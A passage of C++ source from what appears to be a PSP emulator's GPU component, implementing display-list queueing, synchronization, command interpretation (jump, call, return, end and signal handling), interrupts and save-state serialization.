if(!dlQueue.empty()) {
dlQueue.pop_front();
if(!dlQueue.empty()) {
bool running = currentList->state == PSP_GE_DL_STATE_RUNNING;
currentList = &dls[dlQueue.front()];
if (running)
currentList->state = PSP_GE_DL_STATE_RUNNING;
} else {
currentList = NULL;
}
}
}
bool GPUCommon::BusyDrawing() {
u32 state = DrawSync(1);
if (state == PSP_GE_LIST_DRAWING || state == PSP_GE_LIST_STALLING) {
lock_guard guard(listLock);
if (currentList && currentList->state != PSP_GE_DL_STATE_PAUSED) {
return true;
}
}
return false;
}
u32 GPUCommon::DrawSync(int mode) {
if (ThreadEnabled()) {
// Sync first, because the CPU is usually faster than the emulated GPU.
SyncThread();
}
easy_guard guard(listLock);
if (mode < 0 || mode > 1)
return SCE_KERNEL_ERROR_INVALID_MODE;
if (mode == 0) {
if (!__KernelIsDispatchEnabled()) {
return SCE_KERNEL_ERROR_CAN_NOT_WAIT;
}
if (__IsInInterrupt()) {
return SCE_KERNEL_ERROR_ILLEGAL_CONTEXT;
}
if (drawCompleteTicks > CoreTiming::GetTicks()) {
__GeWaitCurrentThread(GPU_SYNC_DRAW, 1, "GeDrawSync");
} else {
for (int i = 0; i < DisplayListMaxCount; ++i) {
if (dls[i].state == PSP_GE_DL_STATE_COMPLETED) {
dls[i].state = PSP_GE_DL_STATE_NONE;
}
}
}
return 0;
}
// If there's no current list, it must be complete.
DisplayList *top = NULL;
for (auto it = dlQueue.begin(), end = dlQueue.end(); it != end; ++it) {
if (dls[*it].state != PSP_GE_DL_STATE_COMPLETED) {
top = &dls[*it];
break;
}
}
if (!top || top->state == PSP_GE_DL_STATE_COMPLETED)
return PSP_GE_LIST_COMPLETED;
if (currentList->pc == currentList->stall)
return PSP_GE_LIST_STALLING;
return PSP_GE_LIST_DRAWING;
}
void GPUCommon::CheckDrawSync() {
easy_guard guard(listLock);
if (dlQueue.empty()) {
for (int i = 0; i < DisplayListMaxCount; ++i)
dls[i].state = PSP_GE_DL_STATE_NONE;
}
}
int GPUCommon::ListSync(int listid, int mode) {
if (ThreadEnabled()) {
// Sync first, because the CPU is usually faster than the emulated GPU.
SyncThread();
}
easy_guard guard(listLock);
if (listid < 0 || listid >= DisplayListMaxCount)
return SCE_KERNEL_ERROR_INVALID_ID;
if (mode < 0 || mode > 1)
return SCE_KERNEL_ERROR_INVALID_MODE;
DisplayList& dl = dls[listid];
if (mode == 1) {
switch (dl.state) {
case PSP_GE_DL_STATE_QUEUED:
if (dl.interrupted)
return PSP_GE_LIST_PAUSED;
return PSP_GE_LIST_QUEUED;
case PSP_GE_DL_STATE_RUNNING:
if (dl.pc == dl.stall)
return PSP_GE_LIST_STALLING;
return PSP_GE_LIST_DRAWING;
case PSP_GE_DL_STATE_COMPLETED:
return PSP_GE_LIST_COMPLETED;
case PSP_GE_DL_STATE_PAUSED:
return PSP_GE_LIST_PAUSED;
default:
return SCE_KERNEL_ERROR_INVALID_ID;
}
}
if (!__KernelIsDispatchEnabled()) {
return SCE_KERNEL_ERROR_CAN_NOT_WAIT;
}
if (__IsInInterrupt()) {
return SCE_KERNEL_ERROR_ILLEGAL_CONTEXT;
}
if (dl.waitTicks > CoreTiming::GetTicks()) {
__GeWaitCurrentThread(GPU_SYNC_LIST, listid, "GeListSync");
}
return PSP_GE_LIST_COMPLETED;
}
int GPUCommon::GetStack(int index, u32 stackPtr) {
easy_guard guard(listLock);
if (currentList == NULL) {
// Seems like it doesn't return an error code?
return 0;
}
if (currentList->stackptr <= index) {
return SCE_KERNEL_ERROR_INVALID_INDEX;
}
if (index >= 0) {
auto stack = PSPPointer<u32>::Create(stackPtr);
if (stack.IsValid()) {
auto entry = currentList->stack[index];
// Not really sure what most of these values are.
stack[0] = 0;
stack[1] = entry.pc + 4;
stack[2] = entry.offsetAddr;
stack[7] = entry.baseAddr;
}
}
return currentList->stackptr;
}
u32 GPUCommon::EnqueueList(u32 listpc, u32 stall, int subIntrBase, PSPPointer<PspGeListArgs> args, bool head) {
easy_guard guard(listLock);
// TODO Check the stack values in missing arg and ajust the stack depth
// Check alignment
// TODO Check the context and stack alignement too
if (((listpc | stall) & 3) != 0)
return SCE_KERNEL_ERROR_INVALID_POINTER;
int id = -1;
u64 currentTicks = CoreTiming::GetTicks();
u32_le stackAddr = args.IsValid() ? args->stackAddr : 0;
// Check compatibility
if (sceKernelGetCompiledSdkVersion() > 0x01FFFFFF) {
//numStacks = 0;
//stack = NULL;
for (int i = 0; i < DisplayListMaxCount; ++i) {
if (dls[i].state != PSP_GE_DL_STATE_NONE && dls[i].state != PSP_GE_DL_STATE_COMPLETED) {
// Logically, if the CPU has not interrupted yet, it hasn't seen the latest pc either.
// Exit enqueues right after an END, which fails without ignoring pendingInterrupt lists.
if (dls[i].pc == listpc && !dls[i].pendingInterrupt) {
ERROR_LOG(G3D, "sceGeListEnqueue: can't enqueue, list address %08X already used", listpc);
return 0x80000021;
} else if (stackAddr != 0 && dls[i].stackAddr == stackAddr && !dls[i].pendingInterrupt) {
ERROR_LOG(G3D, "sceGeListEnqueue: can't enqueue, stack address %08X already used", stackAddr);
return 0x80000021;
}
}
}
}
// TODO Check if list stack dls[i].stack already used then return 0x80000021 as above
for (int i = 0; i < DisplayListMaxCount; ++i) {
int possibleID = (i + nextListID) % DisplayListMaxCount;
auto possibleList = dls[possibleID];
if (possibleList.pendingInterrupt) {
continue;
}
if (possibleList.state == PSP_GE_DL_STATE_NONE) {
id = possibleID;
break;
}
if (possibleList.state == PSP_GE_DL_STATE_COMPLETED && possibleList.waitTicks < currentTicks) {
id = possibleID;
}
}
if (id < 0) {
ERROR_LOG_REPORT(G3D, "No DL ID available to enqueue");
for (auto it = dlQueue.begin(); it != dlQueue.end(); ++it) {
DisplayList &dl = dls[*it];
DEBUG_LOG(G3D, "DisplayList %d status %d pc %08x stall %08x", *it, dl.state, dl.pc, dl.stall);
}
return SCE_KERNEL_ERROR_OUT_OF_MEMORY;
}
nextListID = id + 1;
DisplayList &dl = dls[id];
dl.id = id;
dl.startpc = listpc & 0x0FFFFFFF;
dl.pc = listpc & 0x0FFFFFFF;
dl.stall = stall & 0x0FFFFFFF;
dl.subIntrBase = std::max(subIntrBase, -1);
dl.stackptr = 0;
dl.signal = PSP_GE_SIGNAL_NONE;
dl.interrupted = false;
dl.waitTicks = (u64)-1;
dl.interruptsEnabled = interruptsEnabled_;
dl.started = false;
dl.offsetAddr = 0;
dl.bboxResult = false;
dl.stackAddr = stackAddr;
if (args.IsValid() && args->context.IsValid())
dl.context = args->context;
else
dl.context = 0;
if (head) {
if (currentList) {
if (currentList->state != PSP_GE_DL_STATE_PAUSED)
return SCE_KERNEL_ERROR_INVALID_VALUE;
currentList->state = PSP_GE_DL_STATE_QUEUED;
}
dl.state = PSP_GE_DL_STATE_PAUSED;
currentList = &dl;
dlQueue.push_front(id);
} else if (currentList) {
dl.state = PSP_GE_DL_STATE_QUEUED;
dlQueue.push_back(id);
} else {
dl.state = PSP_GE_DL_STATE_RUNNING;
currentList = &dl;
dlQueue.push_front(id);
drawCompleteTicks = (u64)-1;
// TODO save context when starting the list if param is set
guard.unlock();
ProcessDLQueue();
}
return id;
}
u32 GPUCommon::DequeueList(int listid) {
easy_guard guard(listLock);
if (listid < 0 || listid >= DisplayListMaxCount || dls[listid].state == PSP_GE_DL_STATE_NONE)
return SCE_KERNEL_ERROR_INVALID_ID;
auto &dl = dls[listid];
if (dl.started)
return SCE_KERNEL_ERROR_BUSY;
dl.state = PSP_GE_DL_STATE_NONE;
if (listid == dlQueue.front())
PopDLQueue();
else
dlQueue.remove(listid);
dl.waitTicks = 0;
__GeTriggerWait(GPU_SYNC_LIST, listid);
CheckDrawSync();
return 0;
}
u32 GPUCommon::UpdateStall(int listid, u32 newstall) {
easy_guard guard(listLock);
if (listid < 0 || listid >= DisplayListMaxCount || dls[listid].state == PSP_GE_DL_STATE_NONE)
return SCE_KERNEL_ERROR_INVALID_ID;
auto &dl = dls[listid];
if (dl.state == PSP_GE_DL_STATE_COMPLETED)
return SCE_KERNEL_ERROR_ALREADY;
dl.stall = newstall & 0x0FFFFFFF;
guard.unlock();
ProcessDLQueue();
return 0;
}
u32 GPUCommon::Continue() {
easy_guard guard(listLock);
if (!currentList)
return 0;
if (currentList->state == PSP_GE_DL_STATE_PAUSED)
{
if (!isbreak)
{
// TODO: Supposedly this returns SCE_KERNEL_ERROR_BUSY in some case, previously it had
// currentList->signal == PSP_GE_SIGNAL_HANDLER_PAUSE, but it doesn't reproduce.
currentList->state = PSP_GE_DL_STATE_RUNNING;
currentList->signal = PSP_GE_SIGNAL_NONE;
// TODO Restore context of DL is necessary
// TODO Restore BASE
// We have a list now, so it's not complete.
drawCompleteTicks = (u64)-1;
}
else
currentList->state = PSP_GE_DL_STATE_QUEUED;
}
else if (currentList->state == PSP_GE_DL_STATE_RUNNING)
{
if (sceKernelGetCompiledSdkVersion() >= 0x02000000)
return 0x80000020;
return -1;
}
else
{
if (sceKernelGetCompiledSdkVersion() >= 0x02000000)
return 0x80000004;
return -1;
}
guard.unlock();
ProcessDLQueue();
return 0;
}
u32 GPUCommon::Break(int mode) {
easy_guard guard(listLock);
if (mode < 0 || mode > 1)
return SCE_KERNEL_ERROR_INVALID_MODE;
if (!currentList)
return SCE_KERNEL_ERROR_ALREADY;
if (mode == 1)
{
// Clear the queue
dlQueue.clear();
for (int i = 0; i < DisplayListMaxCount; ++i)
{
dls[i].state = PSP_GE_DL_STATE_NONE;
dls[i].signal = PSP_GE_SIGNAL_NONE;
}
nextListID = 0;
currentList = NULL;
return 0;
}
if (currentList->state == PSP_GE_DL_STATE_NONE || currentList->state == PSP_GE_DL_STATE_COMPLETED)
{
if (sceKernelGetCompiledSdkVersion() >= 0x02000000)
return 0x80000004;
return -1;
}
if (currentList->state == PSP_GE_DL_STATE_PAUSED)
{
if (sceKernelGetCompiledSdkVersion() > 0x02000010)
{
if (currentList->signal == PSP_GE_SIGNAL_HANDLER_PAUSE)
{
ERROR_LOG_REPORT(G3D, "sceGeBreak: can't break signal-pausing list");
}
else
return SCE_KERNEL_ERROR_ALREADY;
}
return SCE_KERNEL_ERROR_BUSY;
}
if (currentList->state == PSP_GE_DL_STATE_QUEUED)
{
currentList->state = PSP_GE_DL_STATE_PAUSED;
return currentList->id;
}
// TODO Save BASE
// TODO Adjust pc to be just before SIGNAL/END
// TODO: Is this right?
if (currentList->signal == PSP_GE_SIGNAL_SYNC)
currentList->pc += 8;
currentList->interrupted = true;
currentList->state = PSP_GE_DL_STATE_PAUSED;
currentList->signal = PSP_GE_SIGNAL_HANDLER_SUSPEND;
isbreak = true;
return currentList->id;
}
void GPUCommon::NotifySteppingEnter() {
if (g_Config.bShowDebugStats) {
time_update();
timeSteppingStarted_ = time_now_d();
}
}
void GPUCommon::NotifySteppingExit() {
if (g_Config.bShowDebugStats) {
if (timeSteppingStarted_ <= 0.0) {
ERROR_LOG(G3D, "Mismatched stepping enter/exit.");
}
time_update();
timeSpentStepping_ += time_now_d() - timeSteppingStarted_;
timeSteppingStarted_ = 0.0;
}
}
bool GPUCommon::InterpretList(DisplayList &list) {
// Initialized to avoid a race condition with bShowDebugStats changing.
double start = 0.0;
if (g_Config.bShowDebugStats) {
time_update();
start = time_now_d();
}
easy_guard guard(listLock);
if (list.state == PSP_GE_DL_STATE_PAUSED)
return false;
currentList = &list;
if (!list.started && list.context.IsValid()) {
gstate.Save(list.context);
}
list.started = true;
gstate_c.offsetAddr = list.offsetAddr;
if (!Memory::IsValidAddress(list.pc)) {
ERROR_LOG_REPORT(G3D, "DL PC = %08x WTF!!!!", list.pc);
return true;
}
cycleLastPC = list.pc;
cyclesExecuted += 60;
downcount = list.stall == 0 ? 0x0FFFFFFF : (list.stall - list.pc) / 4;
list.state = PSP_GE_DL_STATE_RUNNING;
list.interrupted = false;
gpuState = list.pc == list.stall ? GPUSTATE_STALL : GPUSTATE_RUNNING;
guard.unlock();
const bool useDebugger = host->GPUDebuggingActive();
const bool useFastRunLoop = !dumpThisFrame_ && !useDebugger;
while (gpuState == GPUSTATE_RUNNING) {
{
easy_guard innerGuard(listLock);
if (list.pc == list.stall) {
gpuState = GPUSTATE_STALL;
downcount = 0;
}
}
if (useFastRunLoop) {
FastRunLoop(list);
} else {
SlowRunLoop(list);
}
{
easy_guard innerGuard(listLock);
downcount = list.stall == 0 ? 0x0FFFFFFF : (list.stall - list.pc) / 4;
if (gpuState == GPUSTATE_STALL && list.stall != list.pc) {
// Unstalled.
gpuState = GPUSTATE_RUNNING;
}
}
}
FinishDeferred();
// We haven't run the op at list.pc, so it shouldn't count.
if (cycleLastPC != list.pc) {
UpdatePC(list.pc - 4, list.pc);
}
list.offsetAddr = gstate_c.offsetAddr;
if (g_Config.bShowDebugStats) {
time_update();
double total = time_now_d() - start - timeSpentStepping_;
hleSetSteppingTime(timeSpentStepping_);
timeSpentStepping_ = 0.0;
gpuStats.msProcessingDisplayLists += total;
}
return gpuState == GPUSTATE_DONE || gpuState == GPUSTATE_ERROR;
}
void GPUCommon::SlowRunLoop(DisplayList &list)
{
const bool dumpThisFrame = dumpThisFrame_;
while (downcount > 0)
{
host->GPUNotifyCommand(list.pc);
u32 op = Memory::ReadUnchecked_U32(list.pc);
u32 cmd = op >> 24;
u32 diff = op ^ gstate.cmdmem[cmd];
PreExecuteOp(op, diff);
if (dumpThisFrame) {
char temp[256];
u32 prev;
if (Memory::IsValidAddress(list.pc - 4)) {
prev = Memory::ReadUnchecked_U32(list.pc - 4);
} else {
prev = 0;
}
GeDisassembleOp(list.pc, op, prev, temp, 256);
NOTICE_LOG(G3D, "%08x: %s", op, temp);
}
gstate.cmdmem[cmd] = op;
ExecuteOp(op, diff);
list.pc += 4;
--downcount;
}
}
// The newPC parameter is used for jumps, we don't count cycles between.
void GPUCommon::UpdatePC(u32 currentPC, u32 newPC) {
// Rough estimate, 2 CPU ticks (it's double the clock rate) per GPU instruction.
u32 executed = (currentPC - cycleLastPC) / 4;
cyclesExecuted += 2 * executed;
cycleLastPC = newPC;
if (g_Config.bShowDebugStats) {
gpuStats.otherGPUCycles += 2 * executed;
gpuStats.gpuCommandsAtCallLevel[std::min(currentList->stackptr, 3)] += executed;
}
// Exit the runloop and recalculate things. This happens a lot in some games.
easy_guard innerGuard(listLock);
if (currentList)
downcount = currentList->stall == 0 ? 0x0FFFFFFF : (currentList->stall - newPC) / 4;
else
downcount = 0;
}
void GPUCommon::ReapplyGfxState() {
if (IsOnSeparateCPUThread()) {
ScheduleEvent(GPU_EVENT_REAPPLY_GFX_STATE);
} else {
ReapplyGfxStateInternal();
}
}
void GPUCommon::ReapplyGfxStateInternal() {
// The commands are embedded in the command memory so we can just reexecute the words. Convenient.
// To be safe we pass 0xFFFFFFFF as the diff.
for (int i = GE_CMD_VERTEXTYPE; i < GE_CMD_BONEMATRIXNUMBER; i++) {
if (i != GE_CMD_ORIGIN && i != GE_CMD_OFFSETADDR) {
ExecuteOp(gstate.cmdmem[i], 0xFFFFFFFF);
}
}
// Can't write to bonematrixnumber here
for (int i = GE_CMD_MORPHWEIGHT0; i <= GE_CMD_PATCHFACING; i++) {
ExecuteOp(gstate.cmdmem[i], 0xFFFFFFFF);
}
// There are a few here in the middle that we shouldn't execute...
for (int i = GE_CMD_VIEWPORTX1; i < GE_CMD_TRANSFERSTART; i++) {
ExecuteOp(gstate.cmdmem[i], 0xFFFFFFFF);
}
// Let's just skip the transfer size stuff, it's just values.
}
inline void GPUCommon::UpdateState(GPURunState state) {
gpuState = state;
if (state != GPUSTATE_RUNNING)
downcount = 0;
}
void GPUCommon::ProcessEvent(GPUEvent ev) {
switch (ev.type) {
case GPU_EVENT_PROCESS_QUEUE:
ProcessDLQueueInternal();
break;
case GPU_EVENT_REAPPLY_GFX_STATE:
ReapplyGfxStateInternal();
break;
default:
ERROR_LOG_REPORT(G3D, "Unexpected GPU event type: %d", (int)ev);
}
}
int GPUCommon::GetNextListIndex() {
easy_guard guard(listLock);
auto iter = dlQueue.begin();
if (iter != dlQueue.end()) {
return *iter;
} else {
return -1;
}
}
bool GPUCommon::ProcessDLQueue() {
ScheduleEvent(GPU_EVENT_PROCESS_QUEUE);
return true;
}
void GPUCommon::ProcessDLQueueInternal() {
startingTicks = CoreTiming::GetTicks();
cyclesExecuted = 0;
UpdateTickEstimate(std::max(busyTicks, startingTicks + cyclesExecuted));
// Game might've written new texture data.
gstate_c.textureChanged = TEXCHANGE_UPDATED;
// Seems to be correct behaviour to process the list anyway?
if (startingTicks < busyTicks) {
DEBUG_LOG(G3D, "Can't execute a list yet, still busy for %lld ticks", busyTicks - startingTicks);
//return;
}
for (int listIndex = GetNextListIndex(); listIndex != -1; listIndex = GetNextListIndex()) {
DisplayList &l = dls[listIndex];
DEBUG_LOG(G3D, "Starting DL execution at %08x - stall = %08x", l.pc, l.stall);
if (!InterpretList(l)) {
return;
} else {
easy_guard guard(listLock);
// Some other list could've taken the spot while we dilly-dallied around.
if (l.state != PSP_GE_DL_STATE_QUEUED) {
// At the end, we can remove it from the queue and continue.
dlQueue.erase(std::remove(dlQueue.begin(), dlQueue.end(), listIndex), dlQueue.end());
}
UpdateTickEstimate(std::max(busyTicks, startingTicks + cyclesExecuted));
}
}
easy_guard guard(listLock);
currentList = NULL;
drawCompleteTicks = startingTicks + cyclesExecuted;
busyTicks = std::max(busyTicks, drawCompleteTicks);
__GeTriggerSync(GPU_SYNC_DRAW, 1, drawCompleteTicks);
// Since the event is in CoreTiming, we're in sync. Just set 0 now.
UpdateTickEstimate(0);
}
void GPUCommon::PreExecuteOp(u32 op, u32 diff) {
// Nothing to do
}
void GPUCommon::Execute_OffsetAddr(u32 op, u32 diff) {
gstate_c.offsetAddr = op << 8;
}
void GPUCommon::Execute_Origin(u32 op, u32 diff) {
easy_guard guard(listLock);
gstate_c.offsetAddr = currentList->pc;
}
void GPUCommon::Execute_Jump(u32 op, u32 diff) {
easy_guard guard(listLock);
const u32 target = gstate_c.getRelativeAddress(op & 0x00FFFFFC);
if (Memory::IsValidAddress(target)) {
UpdatePC(currentList->pc, target - 4);
currentList->pc = target - 4; // pc will be increased after we return, counteract that
} else {
ERROR_LOG_REPORT(G3D, "JUMP to illegal address %08x - ignoring! data=%06x", target, op & 0x00FFFFFF);
}
}
void GPUCommon::Execute_BJump(u32 op, u32 diff) {
if (!currentList->bboxResult) {
// bounding box jump.
easy_guard guard(listLock);
const u32 target = gstate_c.getRelativeAddress(op & 0x00FFFFFC);
if (Memory::IsValidAddress(target)) {
UpdatePC(currentList->pc, target - 4);
currentList->pc = target - 4; // pc will be increased after we return, counteract that
} else {
ERROR_LOG_REPORT(G3D, "BJUMP to illegal address %08x - ignoring! data=%06x", target, op & 0x00FFFFFF);
}
}
}
void GPUCommon::Execute_Call(u32 op, u32 diff) {
easy_guard guard(listLock);
// Saint Seiya needs correct support for relative calls.
const u32 retval = currentList->pc + 4;
const u32 target = gstate_c.getRelativeAddress(op & 0x00FFFFFC);
if (!Memory::IsValidAddress(target)) {
ERROR_LOG_REPORT(G3D, "CALL to illegal address %08x - ignoring! data=%06x", target, op & 0x00FFFFFF);
return;
}
// Bone matrix optimization - many games will CALL a bone matrix (!).
if ((Memory::ReadUnchecked_U32(target) >> 24) == GE_CMD_BONEMATRIXDATA) {
// Check for the end
if ((Memory::ReadUnchecked_U32(target + 11 * 4) >> 24) == GE_CMD_BONEMATRIXDATA &&
(Memory::ReadUnchecked_U32(target + 12 * 4) >> 24) == GE_CMD_RET) {
// Yep, pretty sure this is a bone matrix call.
FastLoadBoneMatrix(target);
return;
}
}
if (currentList->stackptr == ARRAY_SIZE(currentList->stack)) {
ERROR_LOG_REPORT(G3D, "CALL: Stack full!");
} else {
auto &stackEntry = currentList->stack[currentList->stackptr++];
stackEntry.pc = retval;
stackEntry.offsetAddr = gstate_c.offsetAddr;
// The base address is NOT saved/restored for a regular call.
UpdatePC(currentList->pc, target - 4);
currentList->pc = target - 4; // pc will be increased after we return, counteract that
}
}
void GPUCommon::Execute_Ret(u32 op, u32 diff) {
easy_guard guard(listLock);
if (currentList->stackptr == 0) {
DEBUG_LOG_REPORT(G3D, "RET: Stack empty!");
} else {
auto &stackEntry = currentList->stack[--currentList->stackptr];
gstate_c.offsetAddr = stackEntry.offsetAddr;
// We always clear the top (uncached/etc.) bits
const u32 target = stackEntry.pc & 0x0FFFFFFF;
UpdatePC(currentList->pc, target - 4);
currentList->pc = target - 4;
if (!Memory::IsValidAddress(currentList->pc)) {
ERROR_LOG_REPORT(G3D, "Invalid DL PC %08x on return", currentList->pc);
UpdateState(GPUSTATE_ERROR);
}
}
}
void GPUCommon::Execute_End(u32 op, u32 diff) {
easy_guard guard(listLock);
const u32 prev = Memory::ReadUnchecked_U32(currentList->pc - 4);
UpdatePC(currentList->pc);
// Count in a few extra cycles on END.
cyclesExecuted += 60;
switch (prev >> 24) {
case GE_CMD_SIGNAL:
{
// TODO: see http://code.google.com/p/jpcsp/source/detail?r=2935#
SignalBehavior behaviour = static_cast<SignalBehavior>((prev >> 16) & 0xFF);
const int signal = prev & 0xFFFF;
const int enddata = op & 0xFFFF;
bool trigger = true;
currentList->subIntrToken = signal;
switch (behaviour) {
case PSP_GE_SIGNAL_HANDLER_SUSPEND:
// Suspend the list, and call the signal handler. When it's done, resume.
// Before sdkver 0x02000010, listsync should return paused.
if (sceKernelGetCompiledSdkVersion() <= 0x02000010)
currentList->state = PSP_GE_DL_STATE_PAUSED;
currentList->signal = behaviour;
DEBUG_LOG(G3D, "Signal with wait. signal/end: %04x %04x", signal, enddata);
break;
case PSP_GE_SIGNAL_HANDLER_CONTINUE:
// Resume the list right away, then call the handler.
currentList->signal = behaviour;
DEBUG_LOG(G3D, "Signal without wait. signal/end: %04x %04x", signal, enddata);
break;
case PSP_GE_SIGNAL_HANDLER_PAUSE:
// Pause the list instead of ending at the next FINISH.
// Call the handler with the PAUSE signal value at that FINISH.
// Technically, this ought to trigger an interrupt, but it won't do anything.
// But right now, signal is always reset by interrupts, so that causes pause to not work.
trigger = false;
currentList->signal = behaviour;
DEBUG_LOG(G3D, "Signal with Pause. signal/end: %04x %04x", signal, enddata);
break;
case PSP_GE_SIGNAL_SYNC:
// Acts as a memory barrier, never calls any user code.
// Technically, this ought to trigger an interrupt, but it won't do anything.
// Triggering here can cause incorrect rescheduling, which breaks 3rd Birthday.
// However, this is likely a bug in how GE signal interrupts are handled.
trigger = false;
currentList->signal = behaviour;
DEBUG_LOG(G3D, "Signal with Sync. signal/end: %04x %04x", signal, enddata);
break;
case PSP_GE_SIGNAL_JUMP:
{
trigger = false;
currentList->signal = behaviour;
// pc will be increased after we return, counteract that.
u32 target = ((signal << 16) | enddata) - 4;
if (!Memory::IsValidAddress(target)) {
ERROR_LOG_REPORT(G3D, "Signal with Jump: bad address. signal/end: %04x %04x", signal, enddata);
} else {
UpdatePC(currentList->pc, target);
currentList->pc = target;
DEBUG_LOG(G3D, "Signal with Jump. signal/end: %04x %04x", signal, enddata);
}
}
break;
case PSP_GE_SIGNAL_CALL:
{
trigger = false;
currentList->signal = behaviour;
// pc will be increased after we return, counteract that.
u32 target = ((signal << 16) | enddata) - 4;
if (currentList->stackptr == ARRAY_SIZE(currentList->stack)) {
ERROR_LOG_REPORT(G3D, "Signal with Call: stack full. signal/end: %04x %04x", signal, enddata);
} else if (!Memory::IsValidAddress(target)) {
ERROR_LOG_REPORT(G3D, "Signal with Call: bad address. signal/end: %04x %04x", signal, enddata);
} else {
// TODO: This might save/restore other state...
auto &stackEntry = currentList->stack[currentList->stackptr++];
stackEntry.pc = currentList->pc;
stackEntry.offsetAddr = gstate_c.offsetAddr;
stackEntry.baseAddr = gstate.base;
UpdatePC(currentList->pc, target);
currentList->pc = target;
DEBUG_LOG(G3D, "Signal with Call. signal/end: %04x %04x", signal, enddata);
}
}
break;
case PSP_GE_SIGNAL_RET:
{
trigger = false;
currentList->signal = behaviour;
if (currentList->stackptr == 0) {
ERROR_LOG_REPORT(G3D, "Signal with Return: stack empty. signal/end: %04x %04x", signal, enddata);
} else {
// TODO: This might save/restore other state...
auto &stackEntry = currentList->stack[--currentList->stackptr];
gstate_c.offsetAddr = stackEntry.offsetAddr;
gstate.base = stackEntry.baseAddr;
UpdatePC(currentList->pc, stackEntry.pc);
currentList->pc = stackEntry.pc;
DEBUG_LOG(G3D, "Signal with Return. signal/end: %04x %04x", signal, enddata);
}
}
break;
default:
ERROR_LOG_REPORT(G3D, "UNKNOWN Signal UNIMPLEMENTED %i ! signal/end: %04x %04x", behaviour, signal, enddata);
break;
}
// TODO: Technically, jump/call/ret should generate an interrupt, but before the pc change maybe?
if (currentList->interruptsEnabled && trigger) {
if (__GeTriggerInterrupt(currentList->id, currentList->pc, startingTicks + cyclesExecuted)) {
currentList->pendingInterrupt = true;
UpdateState(GPUSTATE_INTERRUPT);
}
}
}
break;
case GE_CMD_FINISH:
switch (currentList->signal) {
case PSP_GE_SIGNAL_HANDLER_PAUSE:
currentList->state = PSP_GE_DL_STATE_PAUSED;
if (currentList->interruptsEnabled) {
if (__GeTriggerInterrupt(currentList->id, currentList->pc, startingTicks + cyclesExecuted)) {
currentList->pendingInterrupt = true;
UpdateState(GPUSTATE_INTERRUPT);
}
}
break;
case PSP_GE_SIGNAL_SYNC:
currentList->signal = PSP_GE_SIGNAL_NONE;
// TODO: Technically this should still cause an interrupt. Probably for memory sync.
break;
default:
currentList->subIntrToken = prev & 0xFFFF;
UpdateState(GPUSTATE_DONE);
if (currentList->interruptsEnabled && __GeTriggerInterrupt(currentList->id, currentList->pc, startingTicks + cyclesExecuted)) {
currentList->pendingInterrupt = true;
} else {
currentList->state = PSP_GE_DL_STATE_COMPLETED;
currentList->waitTicks = startingTicks + cyclesExecuted;
busyTicks = std::max(busyTicks, currentList->waitTicks);
__GeTriggerSync(GPU_SYNC_LIST, currentList->id, currentList->waitTicks);
if (currentList->started && currentList->context.IsValid()) {
gstate.Restore(currentList->context);
ReapplyGfxStateInternal();
}
}
break;
}
break;
default:
DEBUG_LOG(G3D,"Ah, not finished: %06x", prev & 0xFFFFFF);
break;
}
}
void GPUCommon::ExecuteOp(u32 op, u32 diff) {
const u32 cmd = op >> 24;
// Handle control and drawing commands here directly. The others we delegate.
switch (cmd) {
case GE_CMD_NOP:
break;
case GE_CMD_OFFSETADDR:
Execute_OffsetAddr(op, diff);
break;
case GE_CMD_ORIGIN:
Execute_Origin(op, diff);
break;
case GE_CMD_JUMP:
Execute_Jump(op, diff);
break;
case GE_CMD_BJUMP:
Execute_BJump(op, diff);
break;
case GE_CMD_CALL:
Execute_Call(op, diff);
break;
case GE_CMD_RET:
Execute_Ret(op, diff);
break;
case GE_CMD_SIGNAL:
case GE_CMD_FINISH:
// Processed in GE_END.
break;
case GE_CMD_END:
Execute_End(op, diff);
break;
default:
DEBUG_LOG(G3D,"DL Unknown: %08x @ %08x", op, currentList == NULL ? 0 : currentList->pc);
break;
}
}
void GPUCommon::FastLoadBoneMatrix(u32 target) {
gstate.FastLoadBoneMatrix(target);
}
struct DisplayList_v1 {
int id;
u32 startpc;
u32 pc;
u32 stall;
DisplayListState state;
SignalBehavior signal;
int subIntrBase;
u16 subIntrToken;
DisplayListStackEntry stack[32];
int stackptr;
bool interrupted;
u64 waitTicks;
bool interruptsEnabled;
bool pendingInterrupt;
bool started;
size_t contextPtr;
u32 offsetAddr;
bool bboxResult;
};
struct DisplayList_v2 {
int id;
u32 startpc;
u32 pc;
u32 stall;
DisplayListState state;
SignalBehavior signal;
int subIntrBase;
u16 subIntrToken;
DisplayListStackEntry stack[32];
int stackptr;
bool interrupted;
u64 waitTicks;
bool interruptsEnabled;
bool pendingInterrupt;
bool started;
PSPPointer<u32_le> context;
u32 offsetAddr;
bool bboxResult;
};
void GPUCommon::DoState(PointerWrap &p) {
easy_guard guard(listLock);
auto s = p.Section("GPUCommon", 1, 3);
if (!s)
return;
p.Do<int>(dlQueue);
if (s >= 3) {
p.DoArray(dls, ARRAY_SIZE(dls));
} else if (s >= 2) {
for (size_t i = 0; i < ARRAY_SIZE(dls); ++i) {
DisplayList_v2 oldDL;
p.Do(oldDL);
// Copy over everything except the last, new member (stackAddr.)
memcpy(&dls[i], &oldDL, sizeof(DisplayList_v2));
dls[i].stackAddr = 0;
}
} else {
// Can only be in read mode here.
for (size_t i = 0; i < ARRAY_SIZE(dls); ++i) {
DisplayList_v1 oldDL;
p.Do(oldDL);
// On 32-bit, they're the same, on 64-bit oldDL is bigger.
memcpy(&dls[i], &oldDL, sizeof(DisplayList));
// Fix the other fields. Let's hope context wasn't important, it was a pointer.
dls[i].context = 0;
dls[i].offsetAddr = oldDL.offsetAddr;
dls[i].bboxResult = oldDL.bboxResult;
dls[i].stackAddr = 0;
}
}
int currentID = 0;
if (currentList != NULL) {
ptrdiff_t off = currentList - &dls[0];
currentID = (int) (off / sizeof(DisplayList));
}
p.Do(currentID);
if (currentID == 0) {
currentList = NULL;
} else {
currentList = &dls[currentID];
}
p.Do(interruptRunning);
p.Do(gpuState);
p.Do(isbreak);
p.Do(drawCompleteTicks);
p.Do(busyTicks);
}
void GPUCommon::InterruptStart(int listid) {
interruptRunning = true;
}
void GPUCommon::InterruptEnd(int listid) {
easy_guard guard(listLock);
interruptRunning = false;
isbreak = false;
DisplayList &dl = dls[listid];
dl.pendingInterrupt = false;
// TODO: Unless the signal handler could change it?
if (dl.state == PSP_GE_DL_STATE_COMPLETED || dl.state == PSP_GE_DL_STATE_NONE) {
if (dl.started && dl.context.IsValid()) {
gstate.Restore(dl.context);
ReapplyGfxState();
}
dl.waitTicks = 0;
__GeTriggerWait(GPU_SYNC_LIST, listid);
}
guard.unlock();
ProcessDLQueue();
}
